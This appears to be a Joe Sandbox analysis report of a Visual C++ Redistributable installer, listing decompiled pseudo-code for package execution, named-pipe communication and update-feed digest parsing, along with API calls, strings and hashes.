                                                                          							__eflags =  *( *(__edi + 8) + 0x14);
                                                                          							if(__eflags != 0) {
                                                                          								__esi = E0002DC2F(__ecx, __edx, __eflags,  *((intOrPtr*)(__ebx + 0x4b0)), __edi);
                                                                          								__eflags = __esi;
                                                                          								if(__esi < 0) {
                                                                          									_push("Failed to load compatible package on per-machine package.");
                                                                          									_push(__esi);
                                                                          									__eax = E0005012F();
                                                                          									_pop(__ecx);
                                                                          									_pop(__ecx);
                                                                          								}
                                                                          								__edx = _v12;
                                                                          							}
                                                                          							_v8 = __esi;
                                                                          							__eflags = __esi;
                                                                          							if(__esi >= 0) {
                                                                          								L29:
                                                                          								_t75 = _a36;
                                                                          								_t69 = _v20;
                                                                          								if( *_t75 < _t69) {
                                                                          									 *_t75 = _t69;
                                                                          								}
                                                                          								if(_v16 != 0 &&  *_t75 < 2) {
                                                                          									goto L1;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to execute compatible package action.");
                                                                          								L9:
                                                                          								_push(__esi);
                                                                          								L42:
                                                                          								E0005012F();
                                                                          								_t79 = _v8;
                                                                          							}
                                                                          							L43:
                                                                          							return _t79;
                                                                          					}
                                                                          				}
                                                                          				L40:
                                                                          				_push("Invalid execute action.");
                                                                          				goto L41;
                                                                          			}













                                                                          APIs
                                                                          • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,0003BA53,00000001), ref: 00039C18
                                                                          • GetLastError.KERNEL32(?,0003BA53,00000001), ref: 00039D88
                                                                          • GetExitCodeThread.KERNEL32(00000001,00000000,?,0003BA53,00000001), ref: 00039DC8
                                                                          • GetLastError.KERNEL32(?,0003BA53,00000001), ref: 00039DD2
                                                                          Strings
                                                                          • Failed to execute MSI package., xrefs: 00039C78
                                                                          • Failed to execute compatible package action., xrefs: 00039D45
                                                                          • Failed to get cache thread exit code., xrefs: 00039E03
                                                                          • Failed to execute MSU package., xrefs: 00039CCD
                                                                          • apply.cpp, xrefs: 00039DAC, 00039DF6
                                                                          • Invalid execute action., xrefs: 00039E23
                                                                          • Failed to load compatible package on per-machine package., xrefs: 00039D2E
                                                                          • Failed to execute EXE package., xrefs: 00039C4F
                                                                          • Failed to execute package provider registration action., xrefs: 00039CE9
                                                                          • Failed to wait for cache check-point., xrefs: 00039DB9
                                                                          • Failed to execute MSP package., xrefs: 00039C9D
                                                                          • Failed to execute dependency action., xrefs: 00039D08
                                                                          • Cache thread exited unexpectedly., xrefs: 00039E14
                                                                          • @Met, xrefs: 00039D88, 00039DD2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                                          • String ID: @Met$Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
                                                                          • API String ID: 3703294532-2194304339
                                                                          • Opcode ID: a6415e4adac44e34684583c6acc91822e1d79a6131434a102527c8caa3711720
                                                                          • Instruction ID: de36f6c51880942c5562ede6df9320f6d64d66bdc4b8cc3d477c9684f0127812
                                                                          • Opcode Fuzzy Hash: a6415e4adac44e34684583c6acc91822e1d79a6131434a102527c8caa3711720
                                                                          • Instruction Fuzzy Hash: FB716D71A01229EFDB16DF65C941ABEB7FDEF09710F114569F905EB241D3B0AE018BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 75%
                                                                          			E000576A1(intOrPtr* _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				void* __ebx;
                                                                          				void* _t79;
                                                                          				void* _t87;
                                                                          				int _t95;
                                                                          				int _t96;
                                                                          				int _t97;
                                                                          				void* _t100;
                                                                          				void* _t106;
                                                                          				intOrPtr* _t110;
                                                                          				void* _t111;
                                                                          				intOrPtr* _t113;
                                                                          				intOrPtr* _t114;
                                                                          				intOrPtr* _t115;
                                                                          				intOrPtr _t118;
                                                                          				void* _t120;
                                                                          				void* _t122;
                                                                          				void* _t131;
                                                                          				void* _t139;
                                                                          
                                                                          				_t110 = _a4;
                                                                          				_t112 =  &_v20;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t120 =  *((intOrPtr*)( *_t110 + 0x44))(_t110,  &_v20);
                                                                          				if(_t120 < 0) {
                                                                          					L37:
                                                                          					if(_v8 != 0) {
                                                                          						__imp__#6(_v8);
                                                                          					}
                                                                          					_t113 = _v12;
                                                                          					if(_t113 != 0) {
                                                                          						 *((intOrPtr*)( *_t113 + 8))(_t113);
                                                                          					}
                                                                          					_t114 = _v16;
                                                                          					if(_t114 != 0) {
                                                                          						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                                          					}
                                                                          					_t115 = _v20;
                                                                          					if(_t115 != 0) {
                                                                          						 *((intOrPtr*)( *_t115 + 8))(_t115);
                                                                          					}
                                                                          					return _t120;
                                                                          				}
                                                                          				_t79 = E000536D7( &_v20, _v20,  &_v12,  &_v8);
                                                                          				_t118 = _a8;
                                                                          				_t120 = _t79;
                                                                          				if(_t120 != 0) {
                                                                          					L24:
                                                                          					if(_t131 < 0) {
                                                                          						L36:
                                                                          						goto L37;
                                                                          					}
                                                                          					_t116 =  &_v16;
                                                                          					_t120 =  *((intOrPtr*)( *_t110 + 0x30))(_t110,  &_v16);
                                                                          					if(_t120 < 0) {
                                                                          						goto L36;
                                                                          					}
                                                                          					_t120 = E00053760( &_v16, _v16,  &_v12,  &_v8);
                                                                          					_t133 = _t120;
                                                                          					if(_t120 != 0) {
                                                                          						L34:
                                                                          						if(_t139 >= 0) {
                                                                          							_t120 = E000567C4(_t116, _t118 + 0x10, _t110);
                                                                          						}
                                                                          						goto L36;
                                                                          					}
                                                                          					_t87 = _t118 + 0x24;
                                                                          					while(1) {
                                                                          						_t120 = E000579CC(_t110, _t133, _v12, _t87);
                                                                          						if(_t120 < 0) {
                                                                          							goto L36;
                                                                          						}
                                                                          						if(_v8 != 0) {
                                                                          							__imp__#6(_v8);
                                                                          							_v8 = _v8 & 0x00000000;
                                                                          						}
                                                                          						_t116 = _v12;
                                                                          						if(_t116 != 0) {
                                                                          							 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                                          							_v12 = _v12 & 0x00000000;
                                                                          						}
                                                                          						_t120 = E00053760(_t116, _v16,  &_v12,  &_v8);
                                                                          						_t87 = _t118 + 0x24;
                                                                          						_t139 = _t120;
                                                                          						if(_t139 == 0) {
                                                                          							continue;
                                                                          						} else {
                                                                          							goto L34;
                                                                          						}
                                                                          					}
                                                                          					goto L36;
                                                                          				}
                                                                          				_t111 = CompareStringW;
                                                                          				do {
                                                                          					if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"rel", 0xffffffff) != 2) {
                                                                          						_t95 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"href", 0xffffffff);
                                                                          						__eflags = _t95 - 2;
                                                                          						if(_t95 != 2) {
                                                                          							_t96 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"length", 0xffffffff);
                                                                          							__eflags = _t96 - 2;
                                                                          							if(_t96 != 2) {
                                                                          								_t97 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"title", 0xffffffff);
                                                                          								__eflags = _t97 - 2;
                                                                          								if(_t97 != 2) {
                                                                          									__eflags = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"type", 0xffffffff) - 2;
                                                                          									if(__eflags != 0) {
                                                                          										_t100 = E000578C5(_t111, __eflags, _v12, _t118 + 0x20);
                                                                          										L16:
                                                                          										_t120 = _t100;
                                                                          										L17:
                                                                          										if(_t120 < 0) {
                                                                          											goto L36;
                                                                          										}
                                                                          										goto L18;
                                                                          									}
                                                                          									_t106 = _t118 + 8;
                                                                          									L8:
                                                                          									_push(_v12);
                                                                          									_push(_t106);
                                                                          									L5:
                                                                          									_t100 = E000567C4(_t112);
                                                                          									goto L16;
                                                                          								}
                                                                          								_t106 = _t118 + 4;
                                                                          								goto L8;
                                                                          							}
                                                                          							_t122 = E0005329B(_a4, _v8, _t118 + 0x18);
                                                                          							__eflags = _t122 - 0x80070057;
                                                                          							_t120 = (_t122 == 0x80070057) ? 0x8007000d : _t122;
                                                                          							goto L17;
                                                                          						}
                                                                          						_t106 = _t118 + 0xc;
                                                                          						goto L8;
                                                                          					}
                                                                          					_push(_v12);
                                                                          					_push(_t118);
                                                                          					goto L5;
                                                                          					L18:
                                                                          					if(_v8 != 0) {
                                                                          						__imp__#6(_v8);
                                                                          						_v8 = _v8 & 0x00000000;
                                                                          					}
                                                                          					_t112 = _v12;
                                                                          					if(_t112 != 0) {
                                                                          						 *((intOrPtr*)( *_t112 + 8))(_t112);
                                                                          						_v12 = _v12 & 0x00000000;
                                                                          					}
                                                                          					_t120 = E000536D7(_t112, _v20,  &_v12,  &_v8);
                                                                          					_t131 = _t120;
                                                                          				} while (_t131 == 0);
                                                                          				_t110 = _a4;
                                                                          				goto L24;
                                                                          			}

























                                                                          0x00000000

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 00057703
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 00057727
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 00057746
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 0005777D
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 00057798
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000577C3
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00057842
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0005788E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$Compare$Free
                                                                          • String ID: comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                          • API String ID: 318886736-3944986760
                                                                          • Opcode ID: 94aed055e440d9ea081c688266cf93d32eec65c5f2bfa4b4d72d1c7efa1eac78
                                                                          • Instruction ID: c07c7e5c9b341952cae30bb5c188700e39256c26bc9f5dddf30c5bfa85cdb798
                                                                          • Opcode Fuzzy Hash: 94aed055e440d9ea081c688266cf93d32eec65c5f2bfa4b4d72d1c7efa1eac78
                                                                          • Instruction Fuzzy Hash: 71715435D08119FBDF11DB94DC45EAFBBB8EF08722F204694E919A7191DB319E08EB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 51%
                                                                          			E0003CA34(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                          				int _v8;
                                                                          				int _v12;
                                                                          				struct _PROCESS_INFORMATION _v28;
                                                                          				intOrPtr _v32;
                                                                          				char _v36;
                                                                          				intOrPtr _v44;
                                                                          				void* _v48;
                                                                          				long _v52;
                                                                          				char _v56;
                                                                          				void _v60;
                                                                          				int _v64;
                                                                          				char _v68;
                                                                          				struct _STARTUPINFOW _v136;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				signed short _t92;
                                                                          				long _t95;
                                                                          				signed int _t96;
                                                                          				void* _t100;
                                                                          				void* _t101;
                                                                          				void* _t110;
                                                                          
                                                                          				_t100 = __edx;
                                                                          				_t95 = GetCurrentProcessId();
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				E0003F670(_t101,  &_v136, 0, 0x44);
                                                                          				_v68 = 0;
                                                                          				_v64 = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t96 = 6;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				memset( &_v60, 0, _t96 << 2);
                                                                          				E00024B0E( &_v60);
                                                                          				_v36 = _a12;
                                                                          				_v32 = _a16;
                                                                          				if(E00024B96(_t95, _t100,  &_v60,  &_v56) >= 0) {
                                                                          					if(E00024CE8( &_v60, 0,  &_v8) >= 0) {
                                                                          						_push(_t95);
                                                                          						_push(_v56);
                                                                          						_push(_v60);
                                                                          						_push(L"burn.embedded");
                                                                          						if(E00011F62( &_v12, L"%ls -%ls %ls %ls %u", _a8) >= 0) {
                                                                          							if(CreateProcessW(_a4, _v12, 0, 0, 1, 0x8000000, 0, 0,  &_v136,  &_v28) != 0) {
                                                                          								_v52 = GetProcessId(_v28.hProcess);
                                                                          								_v28.hProcess = _v28.hProcess & 0x00000000;
                                                                          								_v48 = _v28.hProcess;
                                                                          								_t110 = E000252E3( &_v60);
                                                                          								if(_t110 >= 0) {
                                                                          									_t110 = E00024FB3(0, _t100, _v44, E0003C992,  &_v36,  &_v68);
                                                                          									if(_t110 >= 0) {
                                                                          										_t110 = E00050917(0, _v48, 0xffffffff, _a20);
                                                                          										if(_t110 < 0) {
                                                                          											_push(_a4);
                                                                          											_push("Failed to wait for embedded executable: %ls");
                                                                          											goto L15;
                                                                          										}
                                                                          									} else {
                                                                          										_push("Failed to process messages from embedded message.");
                                                                          										goto L2;
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to wait for embedded process to connect to pipe.");
                                                                          									goto L2;
                                                                          								}
                                                                          							} else {
                                                                          								_t92 = GetLastError();
                                                                          								_t113 =  <=  ? _t92 : _t92 & 0x0000ffff | 0x80070000;
                                                                          								_t110 =  >=  ? 0x80004005 :  <=  ? _t92 : _t92 & 0x0000ffff | 0x80070000;
                                                                          								E000137D3(0x80004005, "embedded.cpp", 0x4c, _t110);
                                                                          								_push(_a4);
                                                                          								_push("Failed to create embedded process at path: %ls");
                                                                          								L15:
                                                                          								_push(_t110);
                                                                          								E0005012F();
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to allocate embedded command.");
                                                                          							goto L2;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to create embedded pipe.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to create embedded pipe name and client token.");
                                                                          					L2:
                                                                          					_push(_t110);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v28.hThread != 0) {
                                                                          					CloseHandle(_v28.hThread);
                                                                          					_v28.hThread = _v28.hThread & 0x00000000;
                                                                          				}
                                                                          				if(_v28.hProcess != 0) {
                                                                          					CloseHandle(_v28.hProcess);
                                                                          					_v28.hProcess = _v28 & 0x00000000;
                                                                          				}
                                                                          				E00012793(_v12);
                                                                          				if(_v8 != 0) {
                                                                          					CloseHandle(_v8);
                                                                          					_v8 = _v8 & 0x00000000;
                                                                          				}
                                                                          				E00024B2B( &_v60);
                                                                          				return _t110;
                                                                          			}


                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(746561D0,00000002,00000000), ref: 0003CA40
                                                                            • Part of subcall function 00024B96: UuidCreate.RPCRT4(?), ref: 00024BC9
                                                                          • CreateProcessW.KERNEL32 ref: 0003CB1E
                                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 0003CB28
                                                                          • GetProcessId.KERNEL32(000321A5,?,?,00000000,?,?,?,?), ref: 0003CB60
                                                                            • Part of subcall function 000252E3: lstrlenW.KERNEL32(?,?,00000000,?,0005B4F0,?,00000000,?,0001442A,?,0005B4F0), ref: 00025304
                                                                            • Part of subcall function 000252E3: GetCurrentProcessId.KERNEL32(?,0001442A,?,0005B4F0), ref: 0002530F
                                                                            • Part of subcall function 000252E3: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0001442A,?,0005B4F0), ref: 00025346
                                                                            • Part of subcall function 000252E3: ConnectNamedPipe.KERNEL32(?,00000000,?,0001442A,?,0005B4F0), ref: 0002535B
                                                                            • Part of subcall function 000252E3: GetLastError.KERNEL32(?,0001442A,?,0005B4F0), ref: 00025365
                                                                            • Part of subcall function 000252E3: Sleep.KERNEL32(00000064,?,0001442A,?,0005B4F0), ref: 00025396
                                                                            • Part of subcall function 000252E3: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0001442A,?,0005B4F0), ref: 000253B9
                                                                            • Part of subcall function 000252E3: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0001442A,?,0005B4F0), ref: 000253D4
                                                                            • Part of subcall function 000252E3: WriteFile.KERNEL32(?,0001442A,0005B4F0,00000000,00000000,?,0001442A,?,0005B4F0), ref: 000253EF
                                                                            • Part of subcall function 000252E3: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0001442A,?,0005B4F0), ref: 0002540A
                                                                            • Part of subcall function 00050917: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00014E16,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00050927
                                                                            • Part of subcall function 00050917: GetLastError.KERNEL32(?,?,00014E16,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00050935
                                                                          • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0003C992,?,?,?,?,?,00000000,?,?,?,?), ref: 0003CBE4
                                                                          • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0003C992,?,?,?,?,?,00000000,?,?,?,?), ref: 0003CBF3
                                                                          • CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,0003C992,?,?,?,?,?,00000000,?,?,?), ref: 0003CC0A
                                                                          Strings
                                                                          • Failed to wait for embedded process to connect to pipe., xrefs: 0003CB82
                                                                          • Failed to create embedded pipe name and client token., xrefs: 0003CAA3
                                                                          • Failed to allocate embedded command., xrefs: 0003CAF7
                                                                          • embedded.cpp, xrefs: 0003CB49
                                                                          • burn.embedded, xrefs: 0003CADB
                                                                          • %ls -%ls %ls %ls %u, xrefs: 0003CAE3
                                                                          • Failed to create embedded pipe., xrefs: 0003CACA
                                                                          • Failed to process messages from embedded message., xrefs: 0003CBA7
                                                                          • Failed to wait for embedded executable: %ls, xrefs: 0003CBC7
                                                                          • Failed to create embedded process at path: %ls, xrefs: 0003CB56
                                                                          • @Met, xrefs: 0003CB28
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
                                                                          • String ID: %ls -%ls %ls %ls %u$@Met$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                                          • API String ID: 875070380-134372444
                                                                          • Opcode ID: f8ebd885f4740b69e85b246fc47015effb70d65b7dd809845e1e31ba9adac0ce
                                                                          • Instruction ID: ac8b50dd1ab3c0a3501ff2b3e1608da7b2e242afec8e0a1ebcaac624ce248936
                                                                          • Opcode Fuzzy Hash: f8ebd885f4740b69e85b246fc47015effb70d65b7dd809845e1e31ba9adac0ce
                                                                          • Instruction Fuzzy Hash: 2F516D72D40629BBEF22EBA4DC06FDEBBB8AB04711F104121FA04F6191D7759A448BD5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 46%
                                                                          			E00024933(void* __ebx, void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				void* _t23;
                                                                          				void* _t33;
                                                                          				long _t41;
                                                                          				long* _t42;
                                                                          				intOrPtr* _t50;
                                                                          				void* _t53;
                                                                          				void* _t54;
                                                                          				void* _t65;
                                                                          				void* _t66;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t50 = _a4;
                                                                          				_t53 = E00011F20( &_v8, L"\\\\.\\pipe\\%ls",  *_t50);
                                                                          				_t66 = _t65 + 0xc;
                                                                          				if(_t53 >= 0) {
                                                                          					_t54 = 0x8000ffff;
                                                                          					_t41 = 0;
                                                                          					while(_t41 < 0x708) {
                                                                          						_t21 = CreateFileW(_v8, 0xc0000000, 0, 0, 3, 0, 0);
                                                                          						 *(_t50 + 0x10) = _t21;
                                                                          						if(_t21 != 0xffffffff) {
                                                                          							_t54 = 0;
                                                                          						} else {
                                                                          							_t64 =  <=  ? GetLastError() : _t38 & 0x0000ffff | 0x80070000;
                                                                          							_t21 = 0x800705b4;
                                                                          							_t54 =  ==  ? 0x800705b4 :  <=  ? GetLastError() : _t38 & 0x0000ffff | 0x80070000;
                                                                          							Sleep(0x64);
                                                                          						}
                                                                          						_t41 = _t41 + 1;
                                                                          						if(_t54 < 0) {
                                                                          							continue;
                                                                          						}
                                                                          						break;
                                                                          					}
                                                                          					if(_t54 >= 0) {
                                                                          						_t42 = _t50 + 8;
                                                                          						_t53 = E000244E7( *(_t50 + 0x10),  *((intOrPtr*)(_t50 + 4)), _t42);
                                                                          						if(_t53 >= 0) {
                                                                          							if(_a8 == 0) {
                                                                          								L19:
                                                                          								_t23 = OpenProcess(0x100000, 0,  *_t42);
                                                                          								 *(_t50 + 0xc) = _t23;
                                                                          								if(_t23 == 0) {
                                                                          									_t58 =  <=  ? GetLastError() : _t26 & 0x0000ffff | 0x80070000;
                                                                          									_t53 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t26 & 0x0000ffff | 0x80070000;
                                                                          									E000137D3(0x80004005, "pipe.cpp", 0x2a0, _t53);
                                                                          									_push( *_t42);
                                                                          									_push("Failed to open companion process with PID: %u");
                                                                          									goto L21;
                                                                          								}
                                                                          							} else {
                                                                          								_t53 = E00011F20( &_v8, L"\\\\.\\pipe\\%ls.Cache",  *_t50);
                                                                          								_t66 = _t66 + 0xc;
                                                                          								if(_t53 >= 0) {
                                                                          									_t33 = CreateFileW(_v8, 0xc0000000, 0, 0, 3, 0, 0);
                                                                          									 *(_t50 + 0x14) = _t33;
                                                                          									if(_t33 != 0xffffffff) {
                                                                          										_t53 = E000244E7(_t33,  *((intOrPtr*)(_t50 + 4)), _t42);
                                                                          										if(_t53 < 0) {
                                                                          											goto L12;
                                                                          										} else {
                                                                          											goto L19;
                                                                          										}
                                                                          									} else {
                                                                          										_t61 =  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
                                                                          										_t21 = 0x80004005;
                                                                          										_t53 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
                                                                          										_push(_t53);
                                                                          										_push(0x297);
                                                                          										goto L10;
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to allocate name of parent cache pipe.");
                                                                          									_push(_t53);
                                                                          									E0005012F();
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							L12:
                                                                          							_push(_v8);
                                                                          							_push("Failed to verify parent pipe: %ls");
                                                                          							goto L21;
                                                                          						}
                                                                          					} else {
                                                                          						_push(_t54);
                                                                          						_push(0x288);
                                                                          						L10:
                                                                          						_push("pipe.cpp");
                                                                          						E000137D3(_t21);
                                                                          						_push(_v8);
                                                                          						_push("Failed to open parent pipe: %ls");
                                                                          						L21:
                                                                          						_push(_t53);
                                                                          						E0005012F();
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to allocate name of parent pipe.");
                                                                          					_push(_t53);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t53;
                                                                          			}














                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 0002498D
                                                                          • GetLastError.KERNEL32 ref: 0002499B
                                                                          • Sleep.KERNEL32(00000064), ref: 000249BF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorFileLastSleep
                                                                          • String ID: @Met$Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
                                                                          • API String ID: 408151869-519052952
                                                                          • Opcode ID: 56ec43d3978ddf5f4c0c2868887e552ba2c1dd32eb48daae612b7625fbdf5fb4
                                                                          • Instruction ID: 2cc2ac6970fd42bd4d1015b21278a049543ba2a76c86f2d41f685eea37ced474
                                                                          • Opcode Fuzzy Hash: 56ec43d3978ddf5f4c0c2868887e552ba2c1dd32eb48daae612b7625fbdf5fb4
                                                                          • Instruction Fuzzy Hash: 79412832E80731BBEB216BA4EC06BAFB698AF00721F110221FE01FA1D1D7759D5096D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 88%
                                                                          			E00057E36(int __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				int _t42;
                                                                          				intOrPtr _t44;
                                                                          				intOrPtr _t47;
                                                                          				short** _t53;
                                                                          				intOrPtr _t54;
                                                                          				int _t55;
                                                                          				intOrPtr _t56;
                                                                          				intOrPtr _t57;
                                                                          				short* _t58;
                                                                          
                                                                          				_t55 = __ecx;
                                                                          				_t56 = _a8;
                                                                          				_t53 =  *(_a4 + 0x24);
                                                                          				while(_t53 != 0) {
                                                                          					if(CompareStringW(0x7f, 0,  *_t53, 0xffffffff, L"http://appsyndication.org/2006/appsyn", 0xffffffff) != 2) {
                                                                          						L5:
                                                                          						_t8 =  &(_t53[4]); // 0x650076
                                                                          						_t53 =  *_t8;
                                                                          						continue;
                                                                          					}
                                                                          					_t4 =  &(_t53[1]); // 0x2e0069
                                                                          					if(CompareStringW(0x7f, 0, L"digest", 0xffffffff,  *_t4, 0xffffffff) == 2) {
                                                                          						_t19 =  &(_t53[3]); // 0x6c
                                                                          						_t58 =  *_t19;
                                                                          						while(_t58 != 0) {
                                                                          							if(CompareStringW(0x7f, 0, L"algorithm", 0xffffffff, _t58[2], 0xffffffff) == 2) {
                                                                          								if(CompareStringW(0x7f, 1, L"md5", 0xffffffff, _t58[4], 0xffffffff) != 2) {
                                                                          									_t42 = CompareStringW(0x7f, 1, L"sha1", 0xffffffff, _t58[4], 0xffffffff);
                                                                          									_t55 = 2;
                                                                          									if(_t42 == _t55) {
                                                                          										 *(_t56 + 0x18) = _t55;
                                                                          									}
                                                                          								} else {
                                                                          									 *(_t56 + 0x18) = 1;
                                                                          								}
                                                                          								if(CompareStringW(0x7f, 1, L"sha256", 0xffffffff, _t58[4], 0xffffffff) == 2) {
                                                                          									 *(_t56 + 0x18) = 3;
                                                                          								}
                                                                          								L21:
                                                                          								if( *(_t56 + 0x18) != 3) {
                                                                          									_t44 = 0x8007000d;
                                                                          									_push(0x8007000d);
                                                                          									_push(0x17c);
                                                                          									L24:
                                                                          									_t57 = _t44;
                                                                          									L25:
                                                                          									_push("apuputil.cpp");
                                                                          									E000137D3(_t44);
                                                                          									L9:
                                                                          									return _t57;
                                                                          								}
                                                                          								_t29 =  &(_t53[2]); // 0x6c0064
